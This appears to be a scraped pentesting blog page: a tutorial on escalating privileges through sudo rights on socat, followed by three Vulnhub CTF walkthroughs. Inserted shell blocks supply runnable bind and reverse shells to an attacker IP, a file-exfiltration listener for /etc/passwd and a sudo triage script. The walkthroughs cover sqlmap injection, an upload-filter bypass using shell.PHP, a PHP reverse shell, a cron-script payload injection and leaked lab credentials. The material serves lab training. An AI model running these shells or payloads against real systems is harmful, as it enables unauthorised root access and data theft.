Linux For Pentester: socat Privilege Escalation

Welcome back to another command in the "Linux for Pentester" series. Many tools can move data between machines; this time we take advantage of socat, a utility that transfers data between two addresses, and use it in our mission of privilege escalation.

NOTE: "The main objective of publishing the "Linux for pentester" series is to introduce the circumstances and hurdles a pentester may face while solving CTF challenges or OSCP labs based on Linux privilege escalation. We do not criticize any misconfiguration that a network or system administrator makes when granting higher permissions on programs, binaries, files, etc."

Table of Content

Overview of socat             

  • What is socat
  • Basic parameters of socat
  • The operation achieved by socat

Abusing socat

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

What is socat

Socat is a network utility similar to netcat; it supports IPv6 and SSL and is available for both Windows and Linux. The first thing you will notice is that its syntax differs from what you are used to with netcat and other standard Unix tools.

In other words, it is a command-line utility that establishes two bidirectional byte streams and transfers data between them. The streams can be built from a large set of data sources and sinks (files, pipes, devices, sockets, programs), which is what the address types describe.

Its basic syntax is "socat [options] <address> <address>".

We start by looking at the tool's help output (socat -h).

Basic parameters of socat

The most basic socat request is socat [options] <address> <address>; a more interesting example is socat -d -d - TCP4:www.example.com:80.

Here "-d -d" are the options (each -d raises the verbosity), "-" is the first address and TCP4:www.example.com:80 is the second.

The syntax becomes clearer when each component is broken down. Let's start with the address, since it is the keystone of socat.

Addresses:

socat always works with two addresses, so it is important to understand what an address is and how it works. Addresses are given on the command line; invoking socat without any results in an error:

~: socat
2018/09/22 19:12:30 socat[15505] E exactly 2 addresses required (there are 0); use option "-h" for help

Type:

The first component of an address is its type, which specifies what kind of endpoint the address is. Popular types are TCP4, CREATE, EXEC, STDIN, STDOUT, PIPE and UDP4; the names are largely self-explanatory.

Some address types have aliases: "-" is an alias for STDIO, and TCP resolves to TCP4 unless an IPv6 address or the -6 option is given. The man page lists the other aliases.

Parameters:

Immediately after the type come zero or more address parameters, separated from the type and from each other by colons (":").

The number of parameters depends on the address type: TCP4 requires a host and a port, EXEC requires a command line, STDIO takes none. Address options such as fork or reuseaddr follow the parameters and are separated by commas, as in TCP4-LISTEN:1234,reuseaddr,fork.
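To make the grammar above concrete, here is a small shell model of socat's command line, an added example and not code from the original article. The helper names are ours and the one simplification (options written attached, like -d or -T5) is noted in the comments; the grammar itself, a type, colon-separated parameters and comma-separated options, is socat's.

```sh
#!/bin/sh
# Added example, not code from the original post: a small model of socat's command-line
# grammar as described above.
#   socat [options] <address> <address>
#   <address> = <type>[:<param>[:<param>...]][,<option>[=<value>][,<option>...]]
# The helper names are ours; only the grammar is socat's. Simplification: options are
# assumed to be written attached (-d, -v, -x, -T5), not as "-T 5".

# socat_address_type ADDRESS: the type, upper-cased; "-" is the alias for STDIO.
socat_address_type() {
    case "$1" in
        -) echo STDIO ;;
        *) printf '%s\n' "${1%%[:,]*}" | tr 'a-z' 'A-Z' ;;
    esac
}

# socat_address_params ADDRESS: the colon-separated parameters, without the options.
# (A parameter that itself contains a comma would need escaping; not handled here.)
socat_address_params() {
    rest=${1#*:}
    if [ "$rest" = "$1" ]; then
        echo ""                      # no colon at all: the type takes no parameters
    else
        printf '%s\n' "${rest%%,*}"  # cut at the first comma, where options begin
    fi
}

# socat_address_options ADDRESS: the comma-separated options, or an empty line.
socat_address_options() {
    case "$1" in
        *,*) printf '%s\n' "${1#*,}" ;;
        *)   echo "" ;;
    esac
}

# socat_describe ADDRESS: "TYPE|params|options" on one line.
socat_describe() {
    printf '%s|%s|%s\n' "$(socat_address_type "$1")" \
        "$(socat_address_params "$1")" "$(socat_address_options "$1")"
}

# socat_address_count ARGS...: how many arguments are addresses rather than options.
# Anything starting with "-" followed by more characters is an option; a bare "-" is
# an address (STDIO).
socat_address_count() {
    n=0
    for arg in "$@"; do
        case "$arg" in
            -?*) ;;
            *)   n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# socat_argv_check ARGS...: mimic socat's own complaint when the address count is wrong.
socat_argv_check() {
    n=$(socat_address_count "$@")
    if [ "$n" -eq 2 ]; then
        return 0
    fi
    echo "E exactly 2 addresses required (there are $n); use option \"-h\" for help" >&2
    return 1
}

# Walk through the addresses used in this article.
for a in - TCP4:www.example.com:80 TCP4-LISTEN:1234,reuseaddr,fork EXEC:/bin/bash \
         'EXEC:cat /etc/passwd' OPEN:raj,creat,append; do
    socat_describe "$a"
done
socat_argv_check -d -d - TCP4:www.example.com:80 && echo "argv ok: 2 addresses"
socat_argv_check -d -d || true     # prints the "there are 0" complaint
```

The count helper is what produces the "exactly 2 addresses required" message seen above: socat treats everything that is not an option as an address, which is why a bare "-" counts and "-d" does not.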

The operation achieved by socat

Sending and receiving text bidirectionally: socat establishes two bidirectional byte streams and transfers data between them, so the simplest demonstration is a connection between two machines over which text is exchanged.

For this we start a listener on one machine. Here "kali" acts as the listener and receives whatever "ubuntu" sends.

With the listener running, the next step is to run socat on the other machine ("ubuntu"), giving it the IP and port on which the listener waits.

Text typed in either terminal now shows up in the other.

Taking a shell with EXEC: socat can also hand over a shell. Here the goal is to get a shell of "ubuntu" in the "kali" terminal using the EXEC address type.

This time the listener runs on "ubuntu" with EXEC pointing at a shell, and "kali" connects to ubuntu's IP and port (a bind shell: the target listens, the attacker connects). Once connected, kali's terminal is talking to a shell on ubuntu.

To confirm you have the shell of the desired machine, run id. It reports user "raj", a user of "ubuntu", so the shell is indeed ubuntu's.

Transferring a file with EXEC: EXEC can also move a file. Here the "passwd" file is transferred from "ubuntu" to "kali" by the same process: the listener on ubuntu wraps a command that prints the file, and kali connects to it.

Switching to kali and running socat against the listener prints the "passwd" file of the source machine.

Working with other address types: besides EXEC, socat offers types such as CREATE, OPEN, STDIN, STDOUT and PIPE.

In this example there is a text file named "test", and the goal is to have the listener machine serve its content. First "test" is read with cat and the output is piped into socat, whose first address is "-" (standard input). The second address uses OPEN to create a file named "raj" and append the content of "test" to it.

When the listener is then started on "ubuntu" against "raj", it delivers the content of "test" as intended.
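The commands for these operations were shown in screenshots that are not on this page, so the following is an added reconstruction in shell rather than the author's own commands. It wraps each listener/client pair in a function and adds a loopback self-check that runs the EXEC file transfer and the OPEN append against each other on 127.0.0.1; the host names, the port numbers and the file contents are assumptions.

```sh
#!/bin/sh
# Added example, not the original post's commands (those were in screenshots that are
# not on this page): the listener/client pairs for the socat operations above, plus a
# self-check that runs the EXEC file transfer and the OPEN append against each other on
# 127.0.0.1. Host names, ports and file names are assumptions.

# 1. Bidirectional text chat. Listener on "kali", client on "ubuntu".
#    "-" is STDIO, so both sides type and read.
chat_listen()  { socat -d -d TCP4-LISTEN:"$1",reuseaddr - ; }   # kali:   chat_listen 1234
chat_connect() { socat - TCP4:"$1":"$2" ; }                      # ubuntu: chat_connect <kali-ip> 1234

# 2. EXEC to take a shell: a bind shell, the machine whose shell we want listens.
#    ubuntu: bind_shell 1234      kali: chat_connect <ubuntu-ip> 1234, then type "id"
bind_shell() { socat TCP4-LISTEN:"$1",reuseaddr EXEC:/bin/bash ; }

# 3. EXEC to transfer a file: the listener runs cat and hands its output to the client.
#    ubuntu: serve_file 1234 /etc/passwd      kali: fetch <ubuntu-ip> 1234 > passwd
#    (interactively "socat - TCP4:<ubuntu-ip>:1234" does the same; -u makes fetch
#    one-directional so it never waits on stdin)
serve_file() { socat TCP4-LISTEN:"$1",reuseaddr EXEC:"cat $2" ; }
fetch()      { socat -u TCP4:"$1":"$2" - ; }

# 4. OPEN: stdin goes into a file that is created if missing and appended to.
#    cat test | append_to_file raj    (-u: left to right only, so socat does not
#    hit EOF on the empty file and stop early)
append_to_file() { socat -u - OPEN:"$1",creat,append ; }

# loopback_demo: exercise 3 and 4 on this host. Returns 0 when the client received
# exactly what the listener served, 1 on mismatch or connection failure, 3 when socat
# is not installed.
loopback_demo() {
    command -v socat >/dev/null 2>&1 || return 3
    src=$(mktemp); dst=$(mktemp)
    # constructed stand-in for /etc/passwd (the real file is not read here)
    printf 'root:x:0:0:root:/root:/bin/bash\nraj:x:1000:1000::/home/raj:/bin/bash\n' > "$src"
    cat "$src" | append_to_file "$dst"          # OPEN:...,creat,append
    serve_file 43111 "$dst" &                   # EXEC:"cat ..." behind TCP4-LISTEN
    pid=$!
    sleep 1                                     # give the listener time to bind
    got=$(fetch 127.0.0.1 43111) || got=""
    wait "$pid" 2>/dev/null || true
    want=$(cat "$src")
    rm -f "$src" "$dst"
    [ -n "$got" ] && [ "$got" = "$want" ]
}

loopback_demo
echo "loopback demo exit status: $? (0 = ok, 3 = socat not installed)"
```

Note which side listens in each pair: for the chat the attacker listens, while for the EXEC shell and the file transfer the machine holding the shell or the file listens and the other connects, which is why both of those need a path to reach the target's port.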

Abusing socat

Sudo Rights Lab setups for Privilege Escalation

Now we start our mission for privilege escalation. As with the other commands in this series, the lab is set up first by giving socat administrative (sudo) rights.

The local user "test" is given sudo permission to run socat as root.

To add the right, open /etc/sudoers (with visudo) and add an entry under "User privilege specification" that lets test run the socat binary as root.

Exploiting Sudo rights

First Method:

We exploit socat by taking advantage of the sudo permission. First we need a session on the victim machine; only then can we carry out this task.

So we connect to the target over ssh as the local user.

Since "test" has sudo rights, we try to obtain a root shell of the host with socat's EXEC address. First we check the sudo rights of "test" with sudo -l and find that the user can run socat as root without a password.

In a new terminal on the attacking machine, launch socat as a listener; then, on the target, run socat through sudo with the attacker's IP and port to send back a reverse shell.

The connection lands in the listener with root privileges: the shell on the victim machine is root's.

Second Method:

A second way to get the higher-privileged shell is a socat one-liner reverse shell.

Again start socat as a listener in a new terminal and run the one-liner through sudo on the remote machine to obtain a root shell.
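The sudoers line, the sudo -l output and the exploitation commands were in screenshots, so the following shell is an added example rather than the author's own. It assumes the lab entry test ALL=(root) NOPASSWD: /usr/bin/socat, triages a constructed sudo -l listing for NOPASSWD commands that can spawn a shell (the check a pentester does before either method), and wraps the two escalation routes described above as functions; the attacker address 192.168.1.100 and port 1234 are assumptions.

```sh
#!/bin/sh
# Added example, not the original post's commands (its screenshots are not on this page).
# Lab line assumed for /etc/sudoers ("User privilege specification", added with visudo):
#   test ALL=(root) NOPASSWD: /usr/bin/socat
# Then: (a) triage of "sudo -l" output for NOPASSWD commands that can spawn a shell,
# (b) the two escalation routes described above, as functions. Attacker IP and port are
# arguments; 192.168.1.100 and 1234 in the sample calls are assumptions.

# Constructed sample of what "sudo -l" prints for the lab user (not real output).
SUDO_L_SAMPLE='Matching Defaults entries for test on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User test may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/socat
    (root) /usr/bin/apt-get'

# nopasswd_commands: read "sudo -l" output on stdin, print one NOPASSWD command per line.
# Entries look like "(root) NOPASSWD: /usr/bin/socat, /usr/bin/find"; entries that still
# ask for a password (no NOPASSWD tag) are ignored.
nopasswd_commands() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p' \
      | tr ',' '\n' \
      | sed 's/^[[:space:]]*//; s/[[:space:]]*$//' \
      | sed '/^$/d'
}

# Binaries that hand out a shell when run via sudo (partial list; socat is the one this
# article abuses, the rest are the usual GTFOBins suspects).
SHELL_SPAWNERS='socat bash sh dash zsh env find vim vi nano less more awk python python3 perl'

# shell_spawners: filter command paths on stdin down to the ones in SHELL_SPAWNERS.
# "ALL" is passed through because it means every command, a shell included.
shell_spawners() {
    while read -r cmd; do
        [ -n "$cmd" ] || continue
        if [ "$cmd" = ALL ]; then echo ALL; continue; fi
        base=${cmd##*/}
        case " $SHELL_SPAWNERS " in
            *" $base "*) echo "$cmd" ;;
        esac
    done
}

# First method: a full TTY over the reverse connection.
#   attacker:  socat_tty_listener 1234
#   target:    socat_sudo_tty_shell 192.168.1.100 1234
socat_tty_listener()   { socat file:"$(tty)",raw,echo=0 tcp-listen:"$1",reuseaddr ; }
socat_sudo_tty_shell() { sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:"$1":"$2" ; }

# Second method: one-liner reverse shell without a pty. Attacker listens with
#   socat - tcp-listen:1234,reuseaddr
socat_sudo_oneliner()  { sudo socat tcp-connect:"$1":"$2" exec:/bin/bash ; }

printf '%s\n' "$SUDO_L_SAMPLE" | nopasswd_commands | shell_spawners   # prints /usr/bin/socat
```

The first method gives a proper terminal (job control, tab completion, password prompts work) because the target side allocates a pty and the listener puts its own terminal in raw mode; the one-liner is quicker to type but you get a dumb pipe to bash.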

Conclusion: In this way socat, when it can be run through sudo, lets us escalate privileges on the remote machine.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer; she is an enthusiastic pentester and Security Analyst at Ignite Technologies.

WestWild: 1.1: Vulnhub Walkthrough

Today we take on a new CTF challenge, WestWild. Credit for making this VM goes to "Hashim Alsharef". It is a boot2root challenge: root the server and capture the flag to complete it. You can download the VM here.

Security Level: Intermediate

Penetrating Methodology:

Scanning

  • Nmap

Enumeration

  • Enum4Linux
  • Smbclient

Exploitation

  • SSH

Privilege Escalation

  • Exploiting Sudo rights

Walkthrough:

Scanning:

Let's start with scanning. The target VM took the IP address 192.168.1.104 automatically from our local Wi-Fi network.

We then used Nmap for port enumeration and found ports 22, 80, 139 and 445 open.

Enumeration:

Port 445 (SMB) being open suggests a shared directory, so to enumerate it and the other ports we used Enum4Linux. From the results we got some user details and a share named wave.

To confirm the share we used smbclient with a blank password, got lucky, and were able to list it.

Inside the wave share were two text files, FLAG1.txt and message_from_aveng.txt, which we downloaded to our Kali system with the get command.

FLAG1.txt contained a base64-encoded string; decoding it gave a username, wavex, and a password, door+open.

Exploitation:

With a username and a password in hand we tried to SSH into the target and logged in successfully.

Our next job was to reach a root shell. Along the way we found a writable directory, westsidesecret, containing a script file named ififorget.sh.

Inside the script was another username and password: aveng:kaizen+80.

Privilege Escalation:

We switched to the user aveng with su and entered the password. Checking the sudo permissions showed that this user can run all commands as root.

So we switched to a root shell with sudo su and got the root flag.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

The Library:2 Vulnhub Walkthrough

Today we take another challenge, Library2, the second lab of the Library series. Credit for making this VM goes to "Avraham Cohen"; it is a boot2root challenge where we have to root the server. You can download the VM here.

Security Level: Beginner

Penetrating Methodology:

Scanning

  • Netdiscover
  • NMAP

Enumeration

  • Web Directory Search
  • Burpsuite 

Exploitation

  • Sqlmap
  • FTP
  • Shell Upload
  • Netcat

Privilege Escalation

  • Obtaining root password

Walkthrough:

Scanning:

Let's start with scanning. The target VM took the IP address 192.168.1.107 automatically from our local Wi-Fi network.

We used Nmap for port scanning and found ports 21 and 80 open.

Enumeration:

Since port 80 is open we opened the IP address in a browser, but the web page showed nothing useful.

We first ran dirb in default mode and found no directory. Searching with the .php extension turned up /library.php.

Accessing http://192.168.1.107/library.php gave a web page listing the names of a few countries.

Clicking Netherlands returned no information.

We captured the request in Burp Suite, suspecting that the country parameter might be vulnerable to SQL injection, saved the raw request to a text file named sql and marked the injection point with an asterisk (*) for sqlmap, but got nothing.

We then took the hint left by the machine's creator on Vulnhub and changed the request from GET to POST.

The saved request now uses POST instead of GET.

Exploitation:

Now we run sqlmap on this new file.

The results revealed a database named library.

We enumerated the library database further for usernames and passwords.

We found the username globus and password AroundTheWorld for the FTP service.

We connected to the target over FTP with these credentials. Nothing useful was lying around, so we grabbed php-reverse-shell from /usr/share/webshells/php, set the listener IP to ours and named it shell.php.

We then tried to upload it to the target with FTP's put command, but got an access denied error.

It seemed some file-type filtering was happening in the backend. We worked around the filter by renaming the script from shell.php to shell.PHP: a deny list that compares extensions case-sensitively does not match the upper-case extension, while the web server still executed the file as PHP.

We then started a netcat listener on our Kali machine and triggered the shell by browsing to http://192.168.1.107/shell.PHP.
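An added example of the kind of filter this bypass defeats, written here and not taken from the VM (whose filter we never saw): a case-sensitive deny list beside a hardened allow-list check. The allowed extensions are an assumption about what such an upload endpoint expects.

```sh
#!/bin/sh
# Added example, not the VM's actual upload filter (we never saw its source): a deny-list
# extension check that fails the way the one above did, next to a hardened version.
# Each takes a filename and returns 0 (accept the upload) or 1 (reject it).

# Weak: deny list compared case-sensitively. "shell.PHP" is not "*.php", so it passes,
# yet a web server whose PHP handler matches case-insensitively still runs it.
weak_upload_filter() {
    case "$1" in
        *.php|*.phtml|*.phar) return 1 ;;
    esac
    return 0
}

# Hardened: case-fold first, accept only an allow list of expected types, and refuse
# names with more than one extension or with a path separator in them.
hardened_upload_filter() {
    name=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case "$name" in
        */*|*\\*)  return 1 ;;          # no directory traversal via the filename
        *.*.*)     return 1 ;;          # shell.php.jpg, shell.jpg.php, ...
        *.*)       ;;                   # exactly one extension: go on
        *)         return 1 ;;          # no extension at all
    esac
    case "${name##*.}" in
        jpg|jpeg|png|gif|pdf|txt) return 0 ;;   # assumed allow list for this upload endpoint
    esac
    return 1
}

# Comparison on the names from the walkthrough plus a couple of variants.
for f in shell.php shell.PHP shell.php.jpg photo.JPG notes.txt; do
    weak=accept; weak_upload_filter "$f" || weak=reject
    hard=accept; hardened_upload_filter "$f" || hard=reject
    printf '%-14s weak=%-7s hardened=%s\n' "$f" "$weak" "$hard"
done
```

The general lesson is that the filter and the component that later interprets the file must agree on what a name means; when the upload path compares bytes and the web server compares case-insensitively (or honours the first of several extensions), the gap between the two is the bypass.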

Privilege Escalation:

We got a netcat session as a low-privileged user. After some directory traversing we found the root password inside a file named welcome in the /var/mail directory.

We then switched to a root shell with su and completed the challenge.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

dpwwn: 1 Vulnhub Walkthrough

Today we take down another CTF challenge. Credit for making this VM goes to "Debashish Pal"; it is a boot2root challenge where we have to root the machine and capture the flag. You can download the VM here.

Security Level: Beginner

Penetrating Methodology:

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • Mysql

Exploitation

  • SSH
  • Msfvenom
  • Netcat

Privilege Escalation

  • Writable script running on crontab

Walkthrough:

Scanning:

Let's start by scanning the network to identify the target. Netdiscover shows the target's IP address is 192.168.1.101.

Then, as usual, we used Nmap for port enumeration and found ports 22, 80 and 3306 open.

Enumeration:

Since MySQL (3306) is running, we tried to log in to the MySQL server as root with a blank password, and to our surprise it worked.

Once logged in we listed the databases and saw one named ssh; checking its tables we found one set of user credentials: mistic:[email protected]$$swordmistic

Exploitation:

We were able to SSH into the target with these credentials. After logging in we found a file named logrot.sh, a bash script that collects logs.

In the crontab the same file is scheduled to run with root privileges.

So we generated a reverse netcat payload with msfvenom, with our Kali IP as the listener address and port 1234 as the listener port.

We then appended the payload to the logrot.sh script with the echo command.

Privilege Escalation:

Since logrot.sh runs from crontab with root privileges, we started a netcat listener on our Kali machine and waited for the reverse shell. After a while a root shell came back, and with it the root flag.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here